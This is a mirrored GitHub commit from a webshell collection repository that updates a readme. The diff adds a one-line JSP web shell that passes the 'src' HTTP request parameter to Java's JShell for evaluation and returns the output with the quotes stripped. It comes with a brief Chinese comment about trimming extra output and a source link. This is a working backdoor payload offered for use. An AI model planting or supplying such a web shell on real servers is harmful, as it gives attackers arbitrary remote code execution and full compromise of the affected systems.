1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 04:41:28 +00:00

Update readme.md

This commit is contained in:
tennc
2019-10-08 15:30:13 +08:00
committed by GitHub
parent 3d0824a806
commit 5c2f32773f

View File

@@ -6,5 +6,8 @@ readme
如果强迫症想撸掉多余的输出:
```
<%=jdk.jshell.JShell.builder().build().eval(request.getParameter("src")).get(0).value().replaceAll("^\"", "").replaceAll("\"$", "")%>
```
from: http://p2j.cn/?p=1874